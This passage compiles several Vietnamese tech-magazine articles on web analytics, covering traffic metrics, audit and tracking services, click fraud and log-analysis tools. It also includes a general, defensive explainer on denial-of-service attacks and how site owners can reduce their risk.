Tuy nhiên, số đo “unique visitor” không phải lúc nào cũng phản ánh đúng số khách “không trùng” truy cập website. Hàng chục hay hàng trăm người dùng trong một mạng nội bộ (LAN) có thể giao tiếp với thế giới bên ngoài chỉ qua một địa chỉ IP (thông qua firewall hay proxy server) và do vậy chỉ được đếm như một visitor. Một số nhà cung cấp dịch vụ Internet có thể sử dụng DHCP (Dynamic Host Configuration Protocol) sinh ra địa chỉ IP khác nhau cho mỗi file được yêu cầu, trong trường hợp này thì một khách truy cập lại được đếm như nhiều visitor. Rất may là những trường hợp này không phổ biến.

Cùng với số visitor, thời gian mà khách lưu lại website cũng là số đo quan trọng, đánh giá sự quan tâm của khách (Hình 2). Dù nhắm đến mục tiêu gì thì trước hết website cần phải có được sự quan tâm của khách. Số trang xem hay số visitor dù có lớn đến mấy đi nữa cũng sẽ mất ý nghĩa khi mà khách đến rồi đi ngay, không hề dành thời gian xem nội dung và quảng cáo. (Xem phần “Click hay không click?”).

Chỉ số thời gian cùng với các chỉ số đánh giá sự tương tác của khách với website như tỉ lệ khách thực hiện giao dịch (ví dụ mua hàng trực tuyến) hay tỉ lệ khách quay lại so với khách mới... không chỉ đánh giá số lượng mà cả chất lượng khách truy cập.

Các chỉ số về chất lượng ngày càng được quan tâm. Trong môi trường Internet ngày càng cạnh tranh, người ta càng phải chú trọng vào thị trường hẹp hơn và càng cần khách chất lượng hơn có tiềm năng trở thành khách hàng thật sự (thực hiện giao dịch).

Về mặt kỹ thuật, việc đo đếm số hit, pageview, visitor hay thời gian không khó. Hầu hết các nhà phát triển web đều có thể thực hiện và đa phần các website đều có chức năng này.
Dịch vụ “kiểm toán”

Nếu chỉ nhằm mục đích sử dụng cho nội bộ công ty để đánh giá hiệu quả hoạt động của website và nắm bắt nhu cầu của người dùng để đưa ra quyết định những điều chỉnh chiến lược thì không có vấn đề gì. Tuy nhiên, những chỉ số này còn có thể được sử dụng để “báo giá” website với đối tác (ví dụ khách hàng quảng cáo), hay để “so kè” với các website cạnh tranh khác, vì thế cần đến dịch vụ “kiểm toán” độc lập để đảm bảo tính trung thực và khả năng so sánh của các chỉ số.

Dịch vụ “kiểm toán” các chỉ số của website hiện đang phát triển mạnh cùng với xu thế thương mại điện tử. Hiện có đến gần cả trăm dịch vụ đánh giá website trên thị trường, có thể một số tên tuổi lớn như Nielsen Netratings (www.nielsen-netratings.com), comScore (www.comscore.com/metrix), Ominture (www.omniture.com), WebTrends (www.webtrends.com), WebSideStory (www.websidestory.com), Coremetrics (www.coremetrics.com), Core Metrics (www.coremetrics.com), HitsLink (www.hitslink.com), Hitwise (www.hitwise.com)... Ngoài những chỉ số pageview, visitor, thời gian, các dịch vụ này còn có thể ghi nhận nhiều số liệu chi tiết về khách truy cập như họ từ đâu đến và cần tìm gì, họ dùng trình duyệt gì, độ phân giải màn hình bao nhiêu... và cung cấp những tính năng báo cáo thống kê, phân tích dữ liệu tinh vi phục vụ cho việc đánh giá số lượng và chất lượng khách truy cập, hiệu quả hoạt động của website và những chiến dịch quảng cáo tiếp thị trên web.

Những dịch vụ trên cung cấp nhiều thông tin giá trị nhưng giá cũng cao. Giải pháp đắt tiền không phải lúc nào cũng tốt, có những dịch vụ ít tốn kém hơn vẫn có thể cung cấp số liệu thống kê hữu ích cho những website cỡ vừa và nhỏ, như VisiStats (www.visistat.com), ClickTracks (www.clicktracks.com) hay NetTracker (www.sane.com), thậm chí còn có dịch vụ miễn phí nhưng đáng giá như Google Analytics (www.google.com/analytics).

Bỏ ra 30 triệu USD mua hãng Urchin để cung cấp dịch vụ miễn phí (Google cũng có dịch vụ thu phí cung cấp số liệu chi tiết hơn), Google thật sự gây khó cho các dịch vụ cạnh tranh khác nhưng được các chủ website hoan nghênh về những số liệu thống kê phong phú và giá trị, có cả chỉ số về số lượng (lượng truy cập, trang xem,...) lẫn về chất lượng (thời gian, tỉ lệ giao dịch...). Cái tên Google có thể đảm bảo cho độ tin cậy của những chỉ số này. Đây là dịch vụ đánh giá web miễn phí đáng giá nhất hiện nay (Hình 3).

google

Hình 3. Google Analytics có thể cho biết khách từ đâu đến và họ cần tìm gì.

Có một dịch vụ miễn phí khác khá được ưa chuộng đó là Alexa (www.alexa.com). Dịch vụ này đánh giá các chỉ số pageview và “reach” (tính theo số visitor) để xếp hạng website. Khác với Google Analytics có yêu cầu chèn mã lệnh vào các trang web của website cần đánh giá, Alexa thu thập dữ liệu thông qua công cụ Alexa Toolbar cài trên máy khách. Dịch vụ Alexa tiện lợi cho việc so sánh tương quan “thế lực” giữa các website với nhau, tuy nhiên chỉ có tính tham khảo vì thứ hạng Alexa không phản ánh chính xác giá trị của website. Thứ nhất, số lượng người cài Alexa Toolbar nhỏ không đủ đại diện cho cộng đồng người dùng Internet (thật sự chẳng có mấy ai cài công cụ này chỉ để biết thứ hạng của những website mà họ truy cập - mục đích chính của công cụ này). Thứ hai, thứ hạng Alexa dễ bị thao túng, đơn giản nhất là khai thác ngay chính Alexa Toolbar (nhờ nhiều người cài đặt công cụ này và truy cập website thường xuyên), tinh vi hơn thì có thể sử dụng những công cụ như Alexabooster hay Alexa Surf.

Thêm một tên tuổi lớn chuẩn bị vào cuộc sau Google. Năm rồi Microsoft đã mua hãng Deepmetrix (giá chưa được công bố) và sẽ đưa ra dịch vụ đánh giá web trong nay mai, theo nhiều nguồn tin thì dịch vụ này có tên là Gatineau và sẽ được cung cấp miễn phí (Hình 4). Đây có thể sẽ là đối thủ xứng tầm với Google Analytics. Hiện tại Microsoft có giới thiệu thử nghiệm dịch vụ AdCenter Labs (http://adlab.msn.com/DPUI/DPUI.aspx) đánh giá và dự báo về giới tính và độ tuổi của khách truy cập website. Các chỉ số này khá thú vị nhưng khó có thể nói về độ chính xác vì chỉ dựa vào dữ liệu người dùng mạng MSN mà không yêu cầu can thiệp gì đến mã lệnh của website cần đo hay cài đặt công cụ trên máy người dùng (Hình 4).

ad center

Hình 4: Microsoft AdCenter cho những số liệu thống kê thú vị về giới tính và độ tuổi của khách

Hiện còn có nhiều dịch vụ đo website miễn phí khác cũng rất tốt như StatCounter (www.statcounter.com), ClickTracks Appetizer (www.clicktracks.com/products/appetizer/), eXTReMe Tracking (extremetracking.com), SiteMeter (www.sitemeter.com), Add Free Stats (addfreestats.com), Compete (www.compete.com)... một số sử dụng cách thức chèn mã như Google Analytics (trong số này, khác với Google Analytics, một số dịch vụ không được ẩn mà buộc phải hiển thị “nhãn hiệu” của dịch vụ trên các trang web cần đánh giá), một số thu thập dữ liệu qua công cụ cài trên máy khách như Alexa, cũng có dịch vụ lấy thông tin kết hợp từ nhiều nguồn (như Compete, đối thủ của Alexa, thu thập thông tin qua công cụ cài trên máy khách kết hợp với thông tin lấy từ các ISP).

Ngoài ra, hiện cũng có một số dịch vụ đánh giá blog miễn phí như FeedBurner (www.feedburner.com, cho phép đánh giá cả RSS và Podcast) (Hình 4), Measure Map (www.measuremap.com, thuộc Google), IceRocket (tracker.icerocket.com, có xếp hạng blog)... Blog là một dạng website đặc biệt, cần có những chỉ số đặc biệt như số bài gửi lên blog (post) hay số bài bình (comment).

feed burner

Hình 5. FeedBurner có thể đánh giá blog, RSS và Podcast.

Mọi người đều biết nội dung hấp dẫn và giao diện bố cục hợp lý, dễ dùng là những yếu tố quan trọng tạo nên sự thành công của một website. Nhưng dù website có thiết kế tốt đến mấy đi nữa mà không được lòng khách hàng thì cũng vô nghĩa.

Tuy nhiên không hẳn các chỉ số về khách hàng cao đều tốt và ngược lại, điều này còn tuỳ mô hình kinh doanh của website. Ví dụ, chỉ số pageview cao tốt cho website báo trực tuyến vì nó có nghĩa nhiều bài được xem (và có thể thu hút nhiều quảng cáo), nhưng với website hỗ trợ khách hàng thì lại không tốt vì nó có nghĩa khách hàng gặp nhiều trục trặc (với sản phẩm của công ty) và cần hỗ trợ. Hay với dịch vụ tìm kiếm Google, chỉ số thời gian thấp vì Google cung cấp nhanh thông tin khách cần tìm, chỉ số pageview của mỗi khách cũng không cao vì Google có cơ chế xếp hạng để đưa ra những kết quả tìm kiếm thích hợp nhất ngay trang đầu, điều này tốt cho cả Google và người dùng (nhờ vậy Google có lượng khách truy cập thường xuyên đông).

Tùy mô hình kinh doanh, mỗi website có thể cần những chỉ số khác nhau. Và chỉ số chính là chỉ số cho thông tin mà chủ website cần hay “có lợi” (thường được công bố) giúp đánh bóng tên tuổi website. Việc kiểm toán chỉ số cũng tùy: tùy qui mô và lưu lượng của website, và tùy số tiền mà chủ wesbite muốn chi. Để “chứng thực” thế lực của mình, các website lớn có lượng khách truy cập hàng ngày từ hàng triệu trở lên có thể phải cần đến những dịch vụ kiểm toán tên tuổi và có phí. Tuy nhiên đôi khi giải pháp miễn phí (như Google Analytics) cũng có thể cung cấp những số liệu giá trị về website.

Cần đánh giá chỉ số nào và sử dụng dịch vụ kiểm toán nào thì tuỳ, nhưng có một điều chắc chắn đó là website cần được đánh giá.

CLICK HAY KHÔNG CLICK?

Click (nhấn chuột) - một hình thái khác của hit - cũng là một chỉ số quan trọng của website, cho biết hiệu quả của quảng cáo trên web. Số click cao được hiểu là có nhiều người quan tâm - thể hiện bằng việc “click” hay nhấn lên banner hay logo quảng cáo (và làm tăng số click). Và phương thức tính click thu phí (Pay Per Click - PPC hay Cost Per Click - CPC) hiện rất được ưa chuộng. Giống như hit, click cũng bị tình trạng “ảo”. chỉ số này có thể được ngân lên hay được “bơm” dùng chương trình sinh click tự động (được biết đến với tên gọi “clickbot”). Để tránh tình trạng này, click thường được ghi nhận cùng với thông tin nhận dạng (như địa chỉ IP, cookie). Nhưng giải pháp này không triệt để vì vẫn có thể bị “qua mặt”: dùng công cụ tạo địa chỉ IP ảo. Để đối phó, lại phát sinh thêm các dịch vụ kiểm tra click ảo như Click Auditor (http://www.keywordmax.com/click_auditor.html),Vericlix (http://www.vericlix.com)... nhưng trận chiến “click” chưa kết thúc. Các công ty quảng cáo trên web còn phải đau đầu với tình trạng “đọc thuê”, phương thức này đơn giản nhưng khó bị phát hiện: số lượng lớn người dùng ở rải rác khắp nơi được thuê thường xuyên nhận email quảng cáo và truy cập website khách hàng quảng cáo (số tiền thuê nhỏ hơn nhiều so với số tiền chủ website nhận được từ khách hàng quảng cáo). Những người này không hề quan tâm đến nội dung trang web hay quảng cáo, họ chỉ đơn giản nhấn chuột, đến trang web rồi đi ngay. Vấn đề chính đối với click đó là yêu cầu... click! Phương thức tính click vừa làm mất thời gian của người xem (phải nhấn và đợi nạp trang web khác) vừa dễ bị “thất thu” nếu thông tin quảng cáo không “mời gọi” hay trang web của khách hàng quảng cáo không được cập nhật. Thật ra có nhiều hình thức quảng cáo không cần phải click (quảng cáo cung cấp đủ thông tin cho người xem, như quảng cáo trên TV hay báo in). Với những quảng cáo như vậy, người ta có thể sử dụng phương thức tính trang xem - PPV (Pay Per View - PPV hay Cost Per 1000 iMpression - CPM), hay lần giao dịch - CPA (Cost Per Action hay PPA - Pay Per Action).

Nguồn tin: Thế Giới Vi Tính




 

Ngay sau khi kết nối và hoà vào mạng Internet, không chỉ máy chủ lưu giữ website, mà toàn bộ mạng lưới máy tính của bạn rất có thể sẽ trở thành mục tiêu của những cuộc tấn công có chủ ý từ phía các hacker - hay "những tên tội phạm máy tính".

Không chỉ đối với các website thương mại điện tử nhỏ không có các chương trình để duy trì và bảo vệ sự an toàn cần thiết, mà ngay cả những công ty lớn có tên tuổi như Yahoo! Inc, eBay Inc, Amazon.com Inc, Buy.com Inc, CNN.com, E*Trade Group Inc…, và thậm chí đã được cảnh báo trước, cũng khó có thể tránh khỏi những cuộc tấn công và những hậu quả mà những cuộc tấn công đó gây ra như: ngừng hoạt động website, thao túng và phá huỷ các mã chương trình, máy tính của bạn sẽ trở nên kém tính năng, và thậm chí là hàng triệu đô la trong tài khoản của bạn cũng bị lấy trộm.

Bản tin Thương mại Điện tử sẽ giúp bạn tìm hiểu về những cuộc tấn công trên cùng những giải pháp phòng ngừa và khắc phục:

w Cuộc tấn công DoS (Denial of Service): Những cuộc tấn công trên hệ thống Internet.

w Vi rút (Virus): Những cuộc tấn công vào hệ thống mạng nội bộ.

w Ăn trộm thẻ tín dụng (Credit Card Theft): Những cuộc tấn công về cơ sở dữ liệu.

Phần 1 - Cuộc tấn công DoS

Những cuộc tấn công dữ dội đã từng làm giảm giá trị của các website lớn như Yahoo! Inc, eBay Inc, CNN.com và Buy.com Inc được gây ra bởi một cuộc tấn công được gọi là cuộc tấn công DoS - có thể hiểu là "sự phủ nhận dịch vụ". Đây là một trong những hình thức tấn công dễ thực hiện nhất, và là một trong những hình thức tấn công khó tránh và khắc phục nhất. Nó có thể phá huỷ và làm hỏng hệ thống máy của bạn trong hàng giờ đồng hồ.

Về mặt kỹ thuật, những cuộc tấn công DoS có thể được coi là không nguy hại nhiều. Tuy nhiên về mặt tài chính, bạn sẽ bị thiệt hại những khoản doanh thu lớn trong suốt thời gian mà trang web của bạn không hoạt động được.

1. Khái niệm:

Cuộc tấn công DoS là hiện tượng một luồng thông tin được gửi liên tục đến một mục tiêu với ý định làm tràn dữ liệu cho đến khi không có khả năng tải một cách hợp pháp.

Mục tiêu của những cuộc tấn công này là nhằm vào máy chủ web của bạn, thông qua việc phủ nhận khả năng tải thông tin từ hệ thống của bạn. Nhưng, không giống như phần lớn những cuộc tấn công khác, cuộc tấn công DoS không đòi hỏi những hacker phải truy cập bằng được vào các máy chủ mục tiêu. Thay vì vậy, người thực hiện cuộc tấn công này có thể truy cập vào trong những máy tính khác của hệ thống, cài mã chương trình để biến chúng trở thành những "kẻ tòng phạm". Những kẻ tòng phạm này sau đó sẽ gửi hàng loạt những yêu cầu về thông tin đến mục tiêu chính của cuộc tấn công.

Việc gửi hàng loạt những yêu cầu về thông tin từ các máy tính trên sẽ nhanh chóng làm máy chủ mục tiêu trở nên quá tải. Và hậu quả thứ nhất của cuộc tấn công này là tất cả máy chủ sẽ buộc phải tập trung vào để trả lời những yêu cầu thông tin được gửi đến, sẽ không có thời gian để bảo vệ và quan tâm đến các trang web. Và tất yếu hậu quả thứ hai sẽ là: website của bạn sẽ ngừng hoạt động.

2. Cách nhận biết:

Có một cách rất đơn giản để nhận biết ra loại tấn công này. Sẽ không phải bạn và tất nhiên cũng không phải bất kỳ một người nào có khả năng truy cập vào website của bạn. Bạn cần phải có một đội ngũ nhân viên với tư cách là người quản trị mạng - tường tận về tất cả các nội dung của website. Đội ngũ đó hoàn toàn có khả năng phát hiện ra những dấu hiệu của cuộc tấn công như: khối lượng các yêu cầu gửi qua mạng tăng, thời gian truy cập vào website lâu hơn, thời gian thực hiện của hệ thống trả lời chậm lại…

3. Ai là kẻ "chủ mưu" và động cơ thực hiện cuộc tấn công?

Dường như không có một "phần thưởng đáng giá" nào dành cho những kẻ thực hiện cuộc tấn công DoS này. Hoàn toàn không vì mục đích lợi nhuận, động cơ chính của những kẻ "chủ mưu" khi thực hiện cuộc tấn công này là nhằm phô trương tài năng và thử nghiệm những chương trình mà họ nghĩ ra. Các chuyên gia máy tính thường nhìn nhận họ như là những người không có đầu óc và thực sự không sáng tạo. Nhưng đối với các hacker thực hiện âm mưu này, ý định tấn công vào những công ty trực tuyến lớn nhất là một kỳ tích tuyệt vời. Họ có thể tự hào tuyên bố: "Tôi đã hạ bệ được Yahoo!." và làm cho các website nhỏ ngừng hoạt động .

4. Cách tự bảo vệ:

Bạn có thể trở thành "nạn nhân" của cuộc tấn công DoS theo hai con đường: Hoặc bạn là mục tiêu chính của cuộc tấn công hoặc bạn sẽ trở thành "kẻ tòng phạm" không chủ tâm của vụ tấn công.

Để giảm thiểu các rủi ro của cuộc tấn công DoS, bạn có thể tham khảo các giải pháp sau:

w Chuyển dịch vụ web hosting của bạn sang một nhà cung cấp lớn và có uy tín hơn. Họ sẽ có các chương trình để tránh, phát hiện và khắc phục hậu quả của các cuộc tấn công DoS. Và có trách nhiệm trong việc phòng ngừa tấn công cũng như việc đảm bảo website của bạn luôn hoạt động.

Để hiểu thêm thế nào là một dịch vụ web hosting hoàn hảo và bảo mật các bạn có thể tra cứu tại địa chỉ: http://www.thuongmaidientu.com/ecommerce/hosting.html

http://thuongmaidientu.com/bantin/issue45.html

w Quan tâm hơn đến việc đầu tư nâng cấp các phần cứng, nếu bạn thuê máy chủ cho trang web riêng của bạn. Bởi vì, khi khối lượng thông tin mà bạn có thể xử lý càng lớn thì khả năng tấn công làm tràn thông tin trên máy chủ của bạn sẽ càng khó đối với các hacker. Vì vậy, giải pháp đơn giản nhất là: xây dựng nhiều phần cứng với những tính năng kỹ thuật cao để khắc phục những sự cố về dữ liệu. Tuy nhiên, nếu công ty của bạn là các công ty nhỏ, đây có thể không phải là một sự lựa chọn tối ưu.

Các công ty có hệ thống lớn hơn, có thể gia nhập vào cầu dẫn của mạng cục bộ trong cấu trúc máy chủ của họ. Cầu dẫn sẽ có chức năng lưu trữ và chuyển tiếp các bức thư điện tử trong mạng máy tính, đầu tiên nó sẽ xác định tất cả các đường dẫn đến địa chỉ nhận và sau đó lựa chọn đường dẫn thích hợp nhất. Một số các cầu dẫn trên thị trường hiện nay còn có những đặc điểm cho phép bạn hạn chế lượng thông tin tải về. Hơn nữa, khi bạn đã vô tình trở thành nạn nhân của loại tấn công này, các cầu dẫn sẽ giúp bạn phục hồi lại nhanh hơn.

w Chuẩn bị một kế hoạch hỗ trợ để cập nhật lượng thông tin tải đến các địa chỉ web. Khi nhận ra được nguy cơ sẽ trở thành nạn nhân của cuộc tấn công DoS, đó cũng là lúc bạn phải thay đổi khả năng tải hợp lý hơn. Cuộc tấn công DoS là riêng đối với địa chỉ web của bạn, nhưng bạn có thể chuyển tiếp những thông tin đề nghị hợp lý của bạn đến những máy chủ khác trong khi đang bị tấn công. Những kẻ chủ mưu thực hiện cuộc tấn công này sẽ không biết điều đó.

(Theo ThuongMaiDienTu)

 

Bạn có biết ai là khách hàng tuyệt vời nhất của bạn không? Bạn có biết họ mua bao nhiêu hàng hoá và mua khi nào không? Bạn có biết họ sử dụng Website của bạn ra sao không?

Một vài năm trở về trước, có một tổ chức đã sắp xếp thứ tự các Website của tất cả các hãng hàng không từ tốt nhất đến tồi nhất. Website được xếp ở vị trí tốt nhất làm rất nhiều thứ bởi nó là một trong số ít các website thực sự có thông tin về chuyến bay và giá vé trên chính trang chủ.

Nhiều website khác có trang chủ trông rất đẹp. Nhưng để lấy được thông tin cần thiết thì khách viếng thăm phải dành thêm nhiều thời gian hơn nữa trên trang chủ đó. Điều đó thực sự là không “đẹp”. Người ta phải mất thêm nhiều thời gian mới có được thông tin mong muốn.

Bạn có biết những khách hàng tuyệt vời nhất của bạn dùng website của bạn như thế nào không? Những phần nào của website cần được đưa lên trang chủ? Các câu trả lời có thích hợp với từng câu hỏi khác nhau không? Site của bạn có khác với mỗi khách hàng không?

Câu trả lời cho câu hỏi “Khách hàng tốt nhất của bạn dùng website của bạn như thế nào?” có liên quan không chỉ đến thiết kế của website mà còn đến sản phẩm mà bạn cung cấp và các chiến lược marketing tổng thể.

Chi tiết câu trả lời cho câu hỏi trên quá là phức tạp nên không thể trả lời đầy đủ trong một bài viết ngắn. Có một giải pháp là tổ chức các cuộc thảo luận giữa các nhóm marketing và nhóm bán hàng, các nhóm lưu giữ dữ liệu , các nhà phân tích dữ liệu và nhóm quản trị mạng.

Nhóm marketing bắt buộc phải xác định rõ được ai là khách hàng tốt nhất. Thông thường là họ lại không biết. Nhóm lưu giữ dữ liệu sẽ cung cấp các dữ liệu giúp đưa ra chính xác định nghĩa cho đối tượng này, rồi nhóm quản trị mạng sẽ có cách để lần theo thái độ của những khách hàng này.

Phương pháp theo dõi buộc phải có một trình nhận diện. Đó là sự kết hợp của số nhận diện người sử dụng, số ID cookie hoặc địa chỉ IP. Trình nhận diện này sẽ lần theo các thông tin thăm viếng trang web của khách hàng và người ta gọi đó là dữ liệu đường dẫn (path data hoặc clickstream).

Dữ liệu đường dẫn được viết vào tệp tin sổ ghi của website thô và vào một bảng cơ sở dữ liệu đặc biệt để phát triển trình theo dõi thái độ của khách hàng với website. Các nhà phân tích, với các phần mềm khác nhau, sẽ phân tích dữ liệu.

Phần mềm của công ty ClickTracks, sản phẩm đã giành giải thưởng xuất sắc của ClickZ năm 2003, đã làm một công việc tuyệt vời là cho phép các nhà tiếp thị trích dẫn các thông tin hữu ích từ dữ liệu của họ.

Không kể những phần mềm đã được dùng, các thông tin được giới phân tích trích dẫn sẽ giúp cải thiện công việc marketing của bạn. Một vài khách hàng tốt nhất của bạn có thể luôn luôn vào viếng thăm một khu vực nhất định trên website. Điều này có thể có nghĩa rằng khu vực đó cần phải được chú ý chăm chút hơn. Những khách hàng tốt nhất của bạn có thể dụng một số dịch vụ nhất định trên website. Những dịch vụ này nên được nhắc tới trong chiến dịch marketing của bạn. Họ có thể tìm kiếm nhiều thông tin hơn nữa cho một số sản phẩm cụ thể. Và có lẽ bạn nên đề cập đến những thông tin đó trong các bức thư chào hàng.


Tạp chí BCVT & CNTT

 

Làm sao có thể biết Website của bạn đang thực thi tốt công việc của nó? Câu trả lời bạn tìm kiếm có thể đã nằm ngay trên máy chủ của bạn. Bí mật nằm trong việc theo dõi cách thức khách hàng truy nhập website, nhờ đó người quản trị có thể biết được những nơi nào của Website thu hút khách hàng truy nhập và nơi nào không được khách hàng quan tâm.

Thuật ngữ được biết đến như là “phân tích web” (web analytics) không mô tả hết những công đoạn trong quá trình này. Đôi khi việc không tuân theo đúng “thủ tục” có thể khiến bạn mất đi những lợi thế rất lớn trong các hoạt động liên quan tới website.

Trước đây người ta thường chỉ quan tâm tới số lượt truy nhập (hit) và coi đó là chỉ số quan trọng duy nhất đánh giá sự phát triển của website. Tuy nhiên, hiện tại việc theo dõi sự truy nhập của khách hàng đã được nhìn nhận một cách toàn diện hơn nhiều và cho ta không ít con số thống kê. Nếu bạn nghiêm túc với những con số, kết quả thống kê sẽ hỗ trợ bạn đưa ra những quyết định sáng suốt nhất về thiết kế, nội dung, cấu trúc thông tin và sơ đồ điều hướng của website. Thông tin mà bạn có thể có bao gồm số hit của từng trang trong website, mức độ của các công cụ tìm kiếm trong việc lôi kéo người truy nhập tới website của bạn, thông tin về người truy nhập, hệ điều hành và trình duyệt họ đang sử dụng v.v… Với lượng thông tin phong phú như vậy, vấn đề nằm ở chỗ làm sao tận dụng tốt những thông tin đó.

Các bộ đếm miễn phí

Thông tin quan trọng hay vô ích tuỳ thuộc vào nhu cầu của bạn. Chẳng hạn, bạn muốn phát triển các tổ hợp từ khoá (keyword) để lôi kéo thêm người truy nhập hay cần đo lường mức độ hiệu quả của một chiến dịch quảng cáo: do đặt các banner quảng cáo, in địa chỉ Website trên các ấn phẩm hoặc đưa địa chỉ website lên các webite có liên quan.. Cũng có thể bạn muốn biết chính xác nội dung được nhiều người truy nhập nhất, số lượng lỗi phát sinh (theo phản hồi của người truy nhập). Biết được mình quan tâm tới những vấn đề nào bạn sẽ biết cần phải “đo lường” để lấy được những thông tin gì liên quan tới việc truy nhập của người sử dụng.

Quá trình phân tích website bắt đầu từ công việc giản đơn nhất là đong đếm “số hit”. Trên mạng hiện tồn tại không ít các “bộ đếm hit” (hit counter) miễn phí dành cho nhà quản trị. Có hai hình thức cài đặt “bộ đếm hit”: bộ đếm sử dụng qua các đoạn mã (script) được chèn vào các trang Web đặt trên máy chủ của bạn hoặc bộ đếm được “điều khiển từ xa” - đặt trên máy chủ khác. Nếu chỉ muốn đong đếm một trang (trang chủ), bạn nên lựa chọn phương pháp thứ hai. Trong khi đó, giải pháp đặt trực tiếp các đoạn mã đếm trên máy chủ của mình tiện lợi cho việc triển khai đồng loạt nhiều bộ đếm (để so sánh mức độ phổ biến giữa các trang). Ngoài ra, theo hình thức này bạn cũng có thể chủ động lựa chọn cho hiển thị hay không hiển thị kết quả đếm trên trang web.

Có rất bộ đếm tốt, miễn phí. Đầu tiên là WebCounter (
http://www.digits.com), công cụ được coi là một trong những bộ đếm đầu tiên xuất hiện trên mạng, được phân phối dưới cả hai hình thức: tính năng cơ bản (miễn phí) và tính năng nâng cao (tính phí). Tiếp đến phải kể tới FastCounter (http://www.bcentral.com), đặc tính đong đếm mạnh và tin cậy. Nổi bật trong số các bộ đếm cho phép bạn cài đặt trên máy chủ của mình là Matt’s Counter (http://www.scriptarchive.com).

Điều khiển từ xa

Có rất nhiều bộ đếm phức tạp đến, từ thống kê số hit đơn giản và phân tích web theo chiều sâu. Các công cụ thống kê được host ở nơi khác cũng có thể cung cấp cho bạn hầu như mọi thông tin yêu cầu liên quan tới người truy nhập. Công việc mà bạn phải làm chỉ là đăng ký dịch vụ và copy và dán vài dòng mã lệnh lên trang. TheCounter.com là một ví dụ điển hình. Mức phí sử dụng bộ đếm của website này rất “bèo” (trước đây là miễn phí). Dịch vụ của TheCounter.com cung cấp không chỉ thống kê từng trang con mà còn cả con số trung bình trong từng ngày, thông tin tham khảo, chỉ số về độ phân giải màn hình, loại trình duyệt v.v…, tóm lại là những thông tin cần thiết để bạn điều chỉnh website theo nhu cầu người truy nhập. Dịch vụ khác (hoàn toàn miễn phí) là Extreme Tracker. Nó sẽ “nhúng” một đường dẫn tới trang cần thống kê của bạn và có thể hỗ trợ đo đếm nhiều trang (xem chi tiết tại http://www.extreme-dm.com).

Trước khi quyết định cài đặt hoặc đăng ký Extreme Tracker hoặc TheCounter, hãy kiểm tra gói thuê bao hosting của bạn. Nhiều nhà cung cấp dịch vụ hosting tích hợp sẵn các bộ đếm trong tài khoản của khách hàng.

Lựa chọn thống kê trong số hit là một chuyện, việc chắt lọc thông tin từ kho dữ liệu thu thập được trên toàn bộ website lại là chuyện khác. Chính vì vậy, trọng tâm ở đây dịch chuyển từ cách thức thu thập thông tin sang cách thức khai thác những thông tin đã thu thập được. Nếu bạn đã từng xem một tệp nhật ký (log file) nằm trong một máy chủ, bạn sẽ thấy tệp này là các chuỗi ký tự dài, lưu trữ thông tin về những lần truy nhập. Trong tệp tin là thông tin chi tiết về mỗi “hit”: chúng xuất phát từ đâu, kiểu truy vấn thông tin, trang truy nhập, trình duyệt gửi truy vấn, thời gian gửi truy vấn v.v… Có thể bạn sẽ phải trả thêm tiền nếu muốn tiếp cận các log file trong các máy chủ. Một số nhà cung cấp dịch vụ thậm chí không cho phép khách hàng tiếp cận trực tiếp (thời gian thực) các log file.

Chắt lọc thông tin có nghĩa từ các nguồn dữ liệu thô sẽ là điều không tưởng nếu chỉ dùng phương pháp thủ công. Bạn cần các ứng dụng phần mềm phân tích có khả năng tổ chức và sắp xếp thông tin dưới dạng các con số thống kê dễ hiểu. Một khi có được sự hỗ trợ này, bạn sẽ tìm thấy những thông tin hữu dụng mà trước đó thậm chí bạn chưa từng biết tới sự tồn tại của chúng chứ chưa nói là muốn có. AWStats là một ví dụ tuyệt vời về ứng dụng phân tích web. ứng dụng này sử dụng mã CGI để sản sinh ra những biểu đồ, bảng biểu minh hoạ… trực quan cho số liệu thống kê lấy ra từ những log file. Ngoài ra, Analog cũng là một lựa chọn miễn phí cho bạn. Công cụ này tích hợp ít tính năng hơn AWStats nhưng lại cho phép người sử dụng tự điều chỉnh cấu hình từ máy địa phương (local machine). Trong khi AWStats yêu cầu bạn phải xác định đường dẫn tới log file trước khi chạy, Analog cho phép bạn xác định log file khi chương trình đang thực thi. Điều này có nghĩa là bạn có thể sử dụng Analog để đọc các log file trực tiếp trên các máy chủ (live log).

Thêm một ứng dụng khác, Sawmill, cũng dựa vào CGI, có khả năng chạy trực tiếp từ website hoặc máy tính của bạn nhờ một máy chủ web (web server) được tích hợp sẵn trong công cụ. Khác AWStats và Analog, Sawmill là sản phẩm mang tính thương mại. Sawmill hỗ trợ rất nhiều tính năng phân tích và nhiều lựa chọn so với các ứng dụng miễn phí. Một trong những tính năng đặc sắc nhất của Sawmill là khả năng theo dõi và phân tích web trực tiếp (live web tracking).

Các chuyên gia phân tích web phân biệt khá rạch ròi quá trình theo dõi (tracking) và phân tích log file. Quá trình theo dõi web có thể mang lại những dữ liệu tương tự nhưng theo phương thức khác. Trong khi các log máy chủ lưu trữ mọi truy vấn gửi tới trang máy chủ web, máy chủ FTP hay máy chủ email…, các dịch vụ theo dõi chỉ lưu trữ những động thái xuất phát trực tiếp từ người sử dụng (lưu trữ vào cookie rồi chuyển tới cơ sở dữ liệu). Số liệu thống kê qua công cụ phân tích log file mang tính so sánh (nhiều thời điểm), trong khi các công cụ theo dõi chỉ cung cấp thống kê ở một thời điểm cụ thể. Ngoài ra, các tệp tin log còn lưu trữ những thông tin mà các ứng dụng theo dõi website không để ý tới như sự hiện diện của “khách quen”, người truy nhập từ cùng một địa chỉ IP hoặc hoạt động tìm kiếm của các công cụ tìm kiếm (search engine).

Theo dõi theo dòng truy nhập

Những ứng dụng này còn có thể lưu lại các bước người truy nhập truy nhập website của bạn. Clickstream hay Clickpath – dòng truy nhâp, cho thấy mức độ hiệu quả của sơ đồ điều hướng, khả năng thu hút người truy nhập vào các lớp bên trong trang web. Đương nhiên, bạn cũng có thể nắm bắt được phần nào một dòng truy nhập thông qua các log file nhưng kết quả thường không đầy đủ và chính xác.

Để có được các thông tin về dòng truy nhập, nhà quản trị cần cài đặt các cookie, nhúng dữ liệu vào cookie để rồi sau đó tiến hành phân tích từ những dữ liệu thu thập được. Chính vì vậy, đa phần các ứng dụng theo dõi web đều được host từ máy chủ của các nhà cung cấp dịch vụ. Trong số các ứng dụng đã từng được đề cập, Extreme Tracker là một công cụ rất cơ bản nếu đem so sánh với các ứng dụng chuyên nghiệp. OpenTracker (
